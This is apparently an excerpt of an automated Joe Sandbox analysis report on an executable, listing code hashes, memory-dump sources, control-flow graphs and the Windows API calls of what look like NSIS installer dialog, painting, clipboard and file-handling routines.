                                • Instruction ID: c986193efdf5d5caa7e6ee4e4d43468a260c1d1fa5a9f0fbbee8a7b08937b3a3
                                • Opcode Fuzzy Hash: 78cd9126c268ab73f18b644494e26637b2f5af010485707908456f6e994cedac
                                • Instruction Fuzzy Hash: F0900231252001429A4063987A04A8E410547E2702B91D85AB000D534CC92488656331
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f08e34fc276e06c3d92e8ab17550ad1fa807059fda60d5cfe2a4fa4b39b9d7ec
                                • Instruction ID: bb267227662f8e953d50dabcf4033b05734423ddb7beaa934983710ee1e9b4c8
                                • Opcode Fuzzy Hash: f08e34fc276e06c3d92e8ab17550ad1fa807059fda60d5cfe2a4fa4b39b9d7ec
                                • Instruction Fuzzy Hash: E190023926300002D6807298760864A000547D2602F91D85AB000D538CC925886D6331
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82e812e6a32cbbd66c0739815f383cb9ee4b352ffe800102f8b73ec307651250
                                • Instruction ID: d868652e01df2e39dbbb4a82ad0ffa78f0c5eea15832a0f7f132b1d333b26e27
                                • Opcode Fuzzy Hash: 82e812e6a32cbbd66c0739815f383cb9ee4b352ffe800102f8b73ec307651250
                                • Instruction Fuzzy Hash: F090023125504442D60066987608A46000547D1605F51D456B105C575DC6358855B231
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 655df7644b530bf6acd917d99cfdf6f138f3cb4c953f03177570d6f6a88b5850
                                • Instruction ID: 73df5dcef305fb50459d3fd0268a1434636ee8d87090c1f3fdf9996e70b429f6
                                • Opcode Fuzzy Hash: 655df7644b530bf6acd917d99cfdf6f138f3cb4c953f03177570d6f6a88b5850
                                • Instruction Fuzzy Hash: CA90027125100402D64072986604786000547D1701F51C456B505C534EC6698DD97775
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f024b027ec4340c9e7cb17472021051219760e40769e06895e900e784f10d8f0
                                • Instruction ID: ef0afd056a19e63272e901a0d9f3ed76b9061d71785c93eaf762467b390cba5a
                                • Opcode Fuzzy Hash: f024b027ec4340c9e7cb17472021051219760e40769e06895e900e784f10d8f0
                                • Instruction Fuzzy Hash: 4D90023165100502D60172986604656000A47D1641F91C467B101C535ECA358996B231
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9ab6e24af41187d620c9f3fae2b726fde72ea3683f136725529d0559aa137b5
                                • Instruction ID: 490a0bff773c1bb24056aa403d1ce41cd176ada97364120016f4fd745f0630e6
                                • Opcode Fuzzy Hash: e9ab6e24af41187d620c9f3fae2b726fde72ea3683f136725529d0559aa137b5
                                • Instruction Fuzzy Hash: 7890023135100402D60262986614646000987D2745F91C457F141C535DC6358957B232
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: 26a0f03a1063b9cdb77ff6a336e015bc7534de05ffb9100c5d734b6b39f9b15c
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:

                                Control-flow Graph

                                control_flow_graph 270 32a3e020-32a3e207 271 32a3e209-32a3e214 270->271 271->271 272 32a3e216-32a3e231 271->272 273 32a3e237-32a3e250 272->273 274 32a3e2c4-32a3e2c8 272->274 275 32a3e258-32a3e2ba 273->275 276 32a3e2ea-32a3e2ee 274->276 277 32a3e2ca-32a3e2e7 274->277 275->275 278 32a3e2bc-32a3e2bd 275->278 279 32a3e311-32a3e315 276->279 280 32a3e2f0-32a3e30e 276->280 277->276 278->274 281 32a3e332-32a3e34b 279->281 282 32a3e317-32a3e32f 279->282 280->279 282->281
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223170855.0000000032A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 32A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32a30000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                • API String ID: 0-3754132690
                                • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                • Instruction ID: c1265978254bfed71e96761dd0c275b7dbaf1cd8ff1f35ba32e250aa578a86b2
                                • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                • Instruction Fuzzy Hash: A5915DF04483988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85

                                Control-flow Graph

                                control_flow_graph 283 404b0b-404b22 284 404cb4-404cba 283->284 285 404b28-404bf6 GetDlgItem * 3 call 4054de call 405810 GetClientRect GetSystemMetrics SendMessageW * 2 283->285 287 404d00-404d06 284->287 288 404cbc-404ce2 GetDlgItem CreateThread CloseHandle 284->288 309 404bf8-404c0a SendMessageW * 2 285->309 310 404c0c-404c12 285->310 289 404d31-404d37 287->289 290 404d08-404d12 287->290 292 404ce8-404cf1 call 405736 288->292 294 404d39-404d40 289->294 295 404d7f-404d82 289->295 290->292 293 404d14-404d2f ShowWindow * 2 call 4054de 290->293 302 404cf6-404cfd 292->302 293->292 299 404d42-404d4c 294->299 300 404d55-404d6a ShowWindow 294->300 295->292 303 404d88-404d8c 295->303 306 404d4e-404d53 call 405933 299->306 307 404d7b-404d7d 300->307 308 404d6c-404d76 call 405d15 300->308 303->292 304 404d92-404daa SendMessageW 303->304 311 404ec0-404ec2 304->311 312 404db0-404de2 CreatePopupMenu call 405e95 AppendMenuW 304->312 306->292 307->306 308->307 309->310 315 404c14-404c1c SendMessageW 310->315 316 404c1e-404c37 call 4054f5 310->316 311->302 324 404de4-404df4 GetWindowRect 312->324 325 404df8-404e14 TrackPopupMenu 312->325 315->316 322 404c39-404c4d ShowWindow 316->322 323 404c6b-404c91 GetDlgItem SendMessageW 316->323 326 404c5a 322->326 327 404c4f-404c58 ShowWindow 322->327 323->311 329 404c97-404caf SendMessageW * 2 323->329 324->325 325->311 328 404e1a-404e26 325->328 330 404c60-404c66 call 4054de 326->330 327->330 331 404e2e-404e48 SendMessageW 328->331 329->311 330->323 331->331 333 404e4a-404e74 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 331->333 334 404e76-404ea2 SendMessageW 333->334 334->334 335 404ea4-404eba GlobalUnlock SetClipboardData CloseClipboard 334->335 335->311
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(?,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,00000001,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(?,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69

                                Control-flow Graph

                                control_flow_graph 336 404f6d-404f86 337 404f8c-404f92 336->337 338 40510e-405120 336->338 337->338 341 404f98-404f9b 337->341 339 405122-405162 GetDlgItem * 2 call 4054f5 SetClassLongW call 401533 338->339 340 405168-40517c 338->340 343 4051ba-4051bf call 4054c3 340->343 344 40517e-405180 340->344 345 404fb7-404fba 341->345 346 404f9d-404fb2 SetWindowPos 341->346 360 4051c4-4051e3 343->360 348 4051b2-4051b4 344->348 349 405182-40518d call 401399 344->349 352 40500a-405010 345->352 353 404fbc-404fdb ShowWindow 345->353 350 4050fa 346->350 348->343 358 405485 348->358 349->348 377 40518f-4051ad SendMessageW 349->377 359 4050fe-405109 call 405736 350->359 354 405012-405027 DestroyWindow 352->354 355 40502c-40502f 352->355 353->359 361 404fe1-404ff7 GetWindowLongW 353->361 365 405469-405470 354->365 366 405031-40503f SetWindowLongW 355->366 367 405044-40504a 355->367 369 405487-40548e 358->369 359->369 362 4051e5-4051f0 call 401533 360->362 363 4051f6-4051fc 360->363 361->359 364 404ffd-405005 ShowWindow 361->364 362->363 374 405202-405204 363->374 375 405445-40545e DestroyWindow EndDialog 363->375 364->359 365->358 373 405472-405474 365->373 366->369 367->350 376 405050-40506a GetDlgItem 367->376 373->358 381 405476-40547f ShowWindow 373->381 374->375 382 40520a-405261 call 405e95 call 4054f5 * 3 GetDlgItem 374->382 379 405464 375->379 383 40506c-405085 SendMessageW IsWindowEnabled 376->383 384 40508f-405094 376->384 377->369 379->365 381->358 412 405263-40526b 382->412 413 40526f-4052be ShowWindow EnableWindow * 3 382->413 383->358 386 40508b 383->386 387 405096-405097 384->387 388 405099-40509c 384->388 386->384 390 4050da-4050df call 405933 387->390 391 4050ab-4050ae 388->391 392 40509e-4050a5 388->392 390->359 395 4050e1-4050f4 SendMessageW 391->395 397 4050b0-4050b7 391->397 392->395 396 4050a7-4050a9 392->396 395->350 396->390 398 4050c7-4050d0 call 401533 397->398 399 4050b9-4050c5 call 401533 397->399 398->359 409 4050d2 398->409 408 4050d8 399->408 408->390 409->408 412->413 414 4052c0-4052c1 413->414 415 4052c3 413->415 416 4052c4-4052ef GetSystemMenu EnableMenuItem SendMessageW 414->416 415->416 417 4052f1-405306 SendMessageW 416->417 418 405308 416->418 419 40530e-405354 call 4054de call 405cf6 call 406af5 lstrlenW call 405e95 SetWindowTextW call 401399 417->419 418->419 419->360 430 40535a-40535c 419->430 430->360 431 405362-405366 430->431 432 405385-405399 DestroyWindow 431->432 433 405368-40536e 431->433 432->379 435 40539f-4053cc CreateDialogParamW 432->435 433->358 434 405374-40537a 433->434 434->360 436 405380 434->436 435->365 437 4053d2-405429 call 4054f5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 435->437 436->358 437->358 442 40542b-405443 ShowWindow call 4054c3 437->442 442->379
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • EnableWindow.USER32(?,?), ref: 00405288
                                • EnableWindow.USER32(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,FFBD62DF), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 3304020681-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD

                                Control-flow Graph (graph image omitted)
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: N
                                • API String ID: 3270077613-1130791706
                                • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59

                                Control-flow Graph (graph image omitted)
                                APIs
                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,76073420,00000000,76073170), ref: 00405A9C
                                • lstrlenW.KERNEL32(00427CA0,?,?,?,00427CA0,00000000,00434800,00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,00427CA0,?,?,?,00427CA0,00000000,00434800,00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(00427CA0), ref: 00405B40
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-1115850852
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D

                                Control-flow Graph (graph image omitted)
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,00428D00,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNEL32(00000000,00435000,00000000,000000E6,0040A8C8), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,0040A8C8,00000000,000000E3,0040A8C8,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
